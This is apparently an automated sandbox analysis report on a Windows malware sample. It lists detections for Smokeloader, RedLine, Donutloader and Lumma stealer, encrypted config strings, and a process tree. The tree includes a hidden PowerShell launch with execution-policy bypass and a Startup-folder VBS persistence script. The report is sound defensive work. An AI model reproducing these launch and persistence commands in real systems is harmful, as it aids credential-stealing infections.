Source: 00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1732060091.000000000272D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1964408969.0000000002560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000019.00000002.3139489097.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: FpiUD4nYpj.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jjistfr.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 18.2.vm.exe.29e0000.1.raw.unpack, Settings.cs	Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
Source: 25.2.vm.exe.4e40000.1.raw.unpack, Settings.cs	Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='

Source: BD9E.exe.1.dr, PowerShellLoader.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: BD9E.exe.1.dr, PowerShellLoader.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 25.2.vm.exe.4e40000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 25.2.vm.exe.4e40000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 18.2.vm.exe.29e0000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.2.vm.exe.29e0000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@40/44@11/16

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe

Code function: 6_2_00007FF7648DF5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken,

6_2_00007FF7648DF5B0

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe

Code function: 0_2_027347BE CreateToolhelp32Snapshot,Module32First,

0_2_027347BE

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 13_2_00769C80 CoCreateInstance,

13_2_00769C80

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jjistfr

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5252
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4936
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1856:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Mutant created: \Sessions\1\BaseNamedObjects\aqswvfsywrpgi
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\2FBE.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\34CA.exe

File opened: C:\Windows\system32\1b51e9287e07fe5f9c7303f41e266477448f11d4f68bf2229bd2ffc4a52c0333AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"

Source: FpiUD4nYpj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lm.exe, 00000013.00000003.2749271588.0000000003345000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2752517081.0000000003136000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FpiUD4nYpj.exe

Virustotal: Detection: 43%

Source: 34CA.exe	String found in binary or memory: &github.com/filecoin-project/go-address
Source: 34CA.exe	String found in binary or memory: net/addrselect.go
Source: 34CA.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: 34CA.exe	String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: 34CA.exe	String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: 34CA.exe	String found in binary or memory: .1h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= depgithub.com/edsrzf/mmap-gov1.1.0h1:6EUwBLQ/Mcr1EYLE4Tn1VdW1A4ckqCQWZBw8Hr0kjpQ= depgithub.com/filecoin-project/go-addressv1.1.0h1:ofdtUtEsNxkIxkDw67ecSmvtzaVSdcea4boAmLbnHfE= depgithub.com/filecoin-pr
Source: 34CA.exe	String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: 34CA.exe	String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: 34CA.exe	String found in binary or memory: 4z/Oni01D2Gm1Du/vo7/ADDErEP0DNhYaqvcF1p/cFSLGEgObC3rn8jqKTnzuNp4wHD4+XFMSIRNAIIzjOX/KZNc3PRk/O0O7ASRoZctsH2Bd1nJGgtmCymXVz7Rpdu4Nm50g77Trg6nTXIg1ur3ovBmkCw7pL+BrZx45wBgh/hLl9XRe424S9Lh2ZXPjbs4697O00XFV32GKA29/QTxEtCdWE4CQix59dE/Tc+MNcfWwyxJV1ePU1UKPn9EjTGGdTeh
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/constants.go
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.newAddress
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.encode
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.Checksum
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.base32decode
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.decode
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.hash
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.1
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.init
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.func1
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.func2
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.0
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.String
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewIDAddress
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewSecp256k1Address
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.addressHash
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewBLSAddress
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewDelegatedAddress
Source: 34CA.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

Source: unknown	Process created: C:\Users\user\Desktop\FpiUD4nYpj.exe "C:\Users\user\Desktop\FpiUD4nYpj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jjistfr C:\Users\user\AppData\Roaming\jjistfr
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2FBE.exe C:\Users\user\AppData\Local\Temp\2FBE.exe
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\34CA.exe C:\Users\user\AppData\Local\Temp\34CA.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\BD9E.exe C:\Users\user\AppData\Local\Temp\BD9E.exe
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process created: C:\Users\user\AppData\Local\Temp\BD9E.exe "C:\Users\user\AppData\Local\Temp\BD9E.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1128
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1848
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2FBE.exe "C:\Users\user\AppData\Local\Temp\2FBE.exe"
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2FBE.exe "C:\Users\user\AppData\Local\Temp\2FBE.exe"
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2FBE.exe C:\Users\user\AppData\Local\Temp\2FBE.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\34CA.exe C:\Users\user\AppData\Local\Temp\34CA.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\BD9E.exe C:\Users\user\AppData\Local\Temp\BD9E.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2FBE.exe "C:\Users\user\AppData\Local\Temp\2FBE.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2FBE.exe "C:\Users\user\AppData\Local\Temp\2FBE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process created: C:\Users\user\AppData\Local\Temp\BD9E.exe "C:\Users\user\AppData\Local\Temp\BD9E.exe" -HOSTRUNAS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: dnsapi.dll	Jump to behavior
